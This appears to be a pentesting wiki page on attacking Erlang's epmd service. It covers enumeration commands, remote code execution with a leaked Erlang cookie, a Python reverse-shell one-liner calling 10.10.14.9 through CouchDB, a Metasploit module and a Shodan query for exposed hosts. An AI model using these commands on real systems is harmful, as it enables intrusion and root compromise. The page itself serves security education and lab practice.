4369 - Pentesting Erlang Port Mapper Daemon (epmd)

Basic Info

The Erlang Port Mapper Daemon (epmd) acts as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of epmd is crucial for seamless interaction and communication between the different Erlang nodes in a network.

Default port: 4369

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon

This is used by default in RabbitMQ and CouchDB installations.

Enumeration

Manual

echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will prompt an erlang terminal
1> net_adm:names('<HOST>'). %This will return the listen addresses

Automatic

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672

Remote Connection

If you can leak the authentication cookie you will be able to execute code on the host. Usually this cookie is located in ~/.erlang.cookie and is generated by erlang on first start. If it has not been modified or set manually, it is a random string of [A:Z] with a length of 20 characters.

greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"

More information at https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ The author also shares a program to brute-force the cookie:

Local Connection

In this case we will abuse CouchDB to escalate privileges locally:

HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).

Example taken from https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution You can use the Canape HTB machine to practice how to exploit this vuln.

Metasploit

#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce

Shodan

  • port:4369 "at port"
